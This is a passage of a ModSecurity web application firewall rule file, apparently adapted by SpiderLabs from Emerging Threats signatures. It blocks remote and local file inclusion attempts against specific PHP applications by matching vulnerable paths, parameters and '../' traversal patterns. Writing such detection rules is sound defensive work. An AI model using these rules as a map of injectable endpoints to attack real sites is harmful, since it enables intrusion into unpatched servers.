"@contains GET " "chain" SecRule &TX:'/RFI.*ARGS:mosConfig_absolute_path/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Clickheat _main.php mosConfig_absolute_path Parameter Remote File Inclusion - 1',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2009756) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Clickheat main.php mosConfig_absolute_path Parameter Remote File Inclusion - 2 SecRule REQUEST_LINE "@contains /heatmap/main.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009756,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS Clickheat main.php mosConfig_absolute_path Parameter Remote File Inclusion - 2',tag:'web-application-attack',tag:'bugtraq,32190'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/RFI.*ARGS:mosConfig_absolute_path/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Clickheat main.php mosConfig_absolute_path Parameter Remote File Inclusion - 2',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2009757) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Clickheat Cache.php mosConfig_absolute_path Remote File Inclusion SecRule REQUEST_LINE "@contains /Clickheat/Cache.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009757,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS Clickheat Cache.php mosConfig_absolute_path Remote File Inclusion',tag:'web-application-attack',tag:'bugtraq,32190'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/RFI.*ARGS:GLOBALS[mosConfig_absolute_path]/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Clickheat Cache.php mosConfig_absolute_path Remote File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2009758) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Clickheat Clickheat_Heatmap.php mosConfig_absolute_path Remote File Inclusion SecRule REQUEST_LINE "@contains /Clickheat_Heatmap.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009758,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS Clickheat Clickheat_Heatmap.php mosConfig_absolute_path Remote File Inclusion',tag:'web-application-attack',tag:'bugtraq,32190'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/RFI.*ARGS:GLOBALS[mosConfig_absolute_path]/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Clickheat Clickheat_Heatmap.php mosConfig_absolute_path Remote File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2009759) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Clickheat GlobalVariables.php mosConfig_absolute_path Remote File Inclusion - 1 SecRule REQUEST_LINE "@contains /GlobalVariables.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009759,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS Clickheat GlobalVariables.php mosConfig_absolute_path Remote File Inclusion - 1',tag:'web-application-attack',tag:'bugtraq,32190'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/RFI.*ARGS:GLOBALS[mosConfig_absolute_path]/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Clickheat GlobalVariables.php mosConfig_absolute_path Remote File Inclusion - 1',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2009760) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Clickheat main.php mosConfig_absolute_path Parameter Remote File Inclusion -2 SecRule REQUEST_LINE "@contains /overview/main.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009760,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS Clickheat main.php mosConfig_absolute_path Parameter Remote File Inclusion -2',tag:'web-application-attack',tag:'bugtraq,32190'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/RFI.*ARGS:mosConfig_absolute_path/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Clickheat main.php mosConfig_absolute_path Parameter Remote File Inclusion -2',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2009166) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Concord Consortium CoAST header.php sections_file parameter remote file inclusion SecRule REQUEST_LINE "@contains /header.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009166,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS Concord Consortium CoAST header.php sections_file parameter remote file inclusion',tag:'web-application-attack',tag:'bugtraq,31461'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/RFI.*ARGS:sections_file/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Concord Consortium CoAST header.php sections_file parameter remote file inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2009793) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS PHP Crawler footer.php footer_file Parameter Remote File Inclusion SecRule REQUEST_LINE "@contains /footer.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009793,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS PHP Crawler footer.php footer_file Parameter Remote File Inclusion',tag:'web-application-attack',tag:'bugtraq,31217'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/RFI.*ARGS:footer_file/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS PHP Crawler footer.php footer_file Parameter Remote File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2009764) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Cyberfolio css.php theme Parameter Local File Inclusion SecRule REQUEST_LINE "@contains /portfolio/css.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009764,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS Cyberfolio css.php theme Parameter Local File Inclusion',tag:'web-application-attack',tag:'bugtraq,32218'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:theme "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Cyberfolio css.php theme Parameter Local File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2010025) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS DM Albums album.php SECURITY_FILE Parameter Local File Inclusion SecRule REQUEST_LINE "@contains /dm-albums/template/album.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2010025,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS DM Albums album.php SECURITY_FILE Parameter Local File Inclusion',tag:'web-application-attack',tag:'bugtraq,35521'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:SECURITY_FILE "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS DM Albums album.php SECURITY_FILE Parameter Local File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2010027) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS DM Albums album.php SECURITY_FILE Parameter Remote File Inclusion SecRule REQUEST_LINE "@contains /dm-albums/template/album.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2010027,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS DM Albums album.php SECURITY_FILE Parameter Remote File Inclusion',tag:'web-application-attack',tag:'bugtraq,35521'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/RFI.*ARGS:SECURITY_FILE/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS DM Albums album.php SECURITY_FILE Parameter Remote File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2011099) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS DaFun Spirit lgsl_players.php lgsl_path Parameter Remote File Inclusion SecRule REQUEST_LINE "@contains /modules/dfss/lgsl/lgsl_players.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2011099,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS DaFun Spirit lgsl_players.php lgsl_path Parameter Remote File Inclusion',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/RFI.*ARGS:lgsl_path/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS DaFun Spirit lgsl_players.php lgsl_path Parameter Remote File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2011100) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS DaFun Spirit lgsl_settings.php lgsl_path Parameter Remote File Inclusion SecRule REQUEST_LINE "@contains /modules/dfss/lgsl/lgsl_settings.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2011100,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS DaFun Spirit lgsl_settings.php lgsl_path Parameter Remote File Inclusion',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/RFI.*ARGS:lgsl_path/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS DaFun Spirit lgsl_settings.php lgsl_path Parameter Remote File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2010252) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Datalife Engine api.class.php dle_config_api Parameter Remote File Inclusion SecRule REQUEST_LINE "@contains /engine/api/api.class.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2010252,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS Datalife Engine api.class.php dle_config_api Parameter Remote File Inclusion',tag:'web-application-attack',tag:'url,www.juniper.net/security/auto/vulnerabilities/vuln36212.html'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/RFI.*ARGS:dle_config_api/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Datalife Engine api.class.php dle_config_api Parameter Remote File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2009324) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Demium CMS urheber.php name Parameter Local File Inclusion SecRule REQUEST_LINE "@contains /urheber.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009324,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS Demium CMS urheber.php name Parameter Local File Inclusion',tag:'web-application-attack',tag:'bugtraq,33933'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:name "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Demium CMS urheber.php name Parameter Local File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2009317) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS DesktopOnNet don3_requiem.php app_path Parameter Remote File Inclusion SecRule REQUEST_LINE "@contains /don3_requiem.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009317,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS DesktopOnNet don3_requiem.php app_path Parameter Remote File Inclusion',tag:'web-application-attack',tag:'cve,2008-2649'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/RFI.*ARGS:app_path/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS DesktopOnNet don3_requiem.php app_path Parameter Remote File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2009318) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS DesktopOnNet frontpage.php app_path Parameter Remote File Inclusion SecRule REQUEST_LINE "@contains /frontpage.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009318,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS DesktopOnNet frontpage.php app_path Parameter Remote File Inclusion',tag:'web-application-attack',tag:'cve,2008-2649'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/RFI.*ARGS:app_path/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS DesktopOnNet frontpage.php app_path Parameter Remote File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2009876) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Dokuwiki doku.php config_cascade Local File Inclusion SecRule REQUEST_LINE "@contains /doku.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009876,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS Dokuwiki doku.php config_cascade Local File Inclusion',tag:'web-application-attack',tag:'bugtraq,35095'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:config_cascade[main][default][] "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Dokuwiki doku.php config_cascade Local File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2009848) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Dragoon header.inc.php root Parameter Remote File Inclusion SecRule REQUEST_LINE "@contains /includes/header.inc.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009848,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS Dragoon header.inc.php root Parameter Remote File Inclusion',tag:'web-application-attack',tag:'bugtraq,28660'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/RFI.*ARGS:root/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Dragoon header.inc.php root Parameter Remote File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2010707) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Dros core.write_compiled_include.php smarty Remote File Inclusion Attempt SecRule REQUEST_LINE "@contains /include/libs/internals/core.write_compiled_include.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2010707,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS Dros core.write_compiled_include.php smarty Remote File Inclusion Attempt',tag:'web-application-attack',tag:'url,www.exploit-db.com/exploits/10682'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/RFI.*ARGS:smarty/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Dros core.write_compiled_include.php smarty Remote File Inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2010708) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Dros core.process_compiled_include.php smarty Remote File Inclusion Attempt SecRule REQUEST_LINE "@contains /include/libs/internals/core.process_compiled_include.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2010708,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS Dros core.process_compiled_include.php smarty Remote File Inclusion Attempt',tag:'web-application-attack',tag:'url,www.exploit-db.com/exploits/10682'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/RFI.*ARGS:smarty/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Dros core.process_compiled_include.php smarty Remote File Inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2010709) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Dros function.config_load.php _compile_file Remote File Inclusion Attempt SecRule REQUEST_LINE "@contains /include/libs/plugins/function.config_load.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2010709,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS Dros function.config_load.php _compile_file Remote File Inclusion Attempt',tag:'web-application-attack',tag:'url,www.exploit-db.com/exploits/10682'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/RFI.*ARGS:_compile_file/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Dros function.config_load.php _compile_file Remote File Inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2003679) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS DynamicPAD Remote Inclusion Attempt -- dp_logs.php HomeDir SecRule REQUEST_LINE "@contains /dp_logs.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2003679,rev:6,msg:'SLR: ET WEB_SPECIFIC_APPS DynamicPAD Remote Inclusion Attempt -- dp_logs.php HomeDir',tag:'web-application-attack',tag:'cve,CVE-2007-2527'" SecRule &TX:'/RFI.*ARGS:HomeDir/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS DynamicPAD Remote Inclusion Attempt -- dp_logs.php HomeDir',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2003680) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS DynamicPAD Remote Inclusion Attempt -- index.php HomeDir SecRule REQUEST_LINE "@contains /index.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2003680,rev:6,msg:'SLR: ET WEB_SPECIFIC_APPS DynamicPAD Remote Inclusion Attempt -- index.php HomeDir',tag:'web-application-attack',tag:'cve,CVE-2007-2527'" SecRule &TX:'/RFI.*ARGS:HomeDir/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS DynamicPAD Remote Inclusion Attempt -- index.php HomeDir',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2003682) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS E-Gads Remote Inclusion Attempt -- common.php locale SecRule REQUEST_LINE "@contains /common.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2003682,rev:6,msg:'SLR: ET WEB_SPECIFIC_APPS E-Gads Remote Inclusion Attempt -- common.php locale',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/3846'" SecRule &TX:'/RFI.*ARGS:locale/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS E-Gads Remote Inclusion Attempt -- common.php locale',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2011725) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS EZPX photoblog tpl_base_dir Parameter Remote File Inclusion Attempt SecRule REQUEST_LINE "@contains /application/views/public/commentform.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2011725,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS EZPX photoblog tpl_base_dir Parameter Remote File Inclusion Attempt',tag:'web-application-attack',tag:'bugtraq,40881'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/RFI.*ARGS:tpl_base_dir/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS EZPX photoblog tpl_base_dir Parameter Remote File Inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2008832) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Enthusiast path parameter Local File Inclusion SecRule REQUEST_LINE "@contains /show_joined.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2008832,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS Enthusiast path parameter Local File Inclusion',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/RFI.*ARGS:path/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Enthusiast path parameter Local File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2008833) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Enthusiast path parameter Remote File Inclusion SecRule REQUEST_LINE "@contains /show_joined.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2008833,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS Enthusiast path parameter Remote File Inclusion',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/RFI.*ARGS:path/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Enthusiast path parameter Remote File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2009428) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS ExBB threadstop.php exbb Parameter Local File Inclusion SecRule REQUEST_LINE "@contains /threadstop/threadstop.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009428,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS ExBB threadstop.php exbb Parameter Local File Inclusion',tag:'web-application-attack',tag:'bugtraq,28686'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:exbb[default_lang] "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS ExBB threadstop.php exbb Parameter Local File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2010800) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS F5 Data Manager DiagLogListActionBody.do Local File Inclusion Attempt SecRule REQUEST_LINE "@contains /acopia/manager/DiagLogListActionBody.do" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2010800,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS F5 Data Manager DiagLogListActionBody.do Local File Inclusion Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:logFile "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS F5 Data Manager DiagLogListActionBody.do Local File Inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2010801) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS F5 Data Manager DiagCaptureFileListActionBody.do Local File Inclusion Attempt SecRule REQUEST_LINE "@contains /acopia/manager/DiagCaptureFileListActionBody.do" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2010801,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS F5 Data Manager DiagCaptureFileListActionBody.do Local File Inclusion Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:captureFile "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS F5 Data Manager DiagCaptureFileListActionBody.do Local File Inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2010802) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS F5 Data Manager ViewSatReport.do Local File Inclusion Attempt SecRule REQUEST_LINE "@contains /acopia/sat/ViewSatReport.do" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2010802,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS F5 Data Manager ViewSatReport.do Local File Inclusion Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:fileName "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS F5 Data Manager ViewSatReport.do Local File Inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2010804) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS F5 Data Manager ViewInventoryErrorReport.do Local File Inclusion Attempt SecRule REQUEST_LINE "@contains /acopia/sat/ViewInventoryErrorReport.do" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2010804,rev:2,msg:'SLR: ET 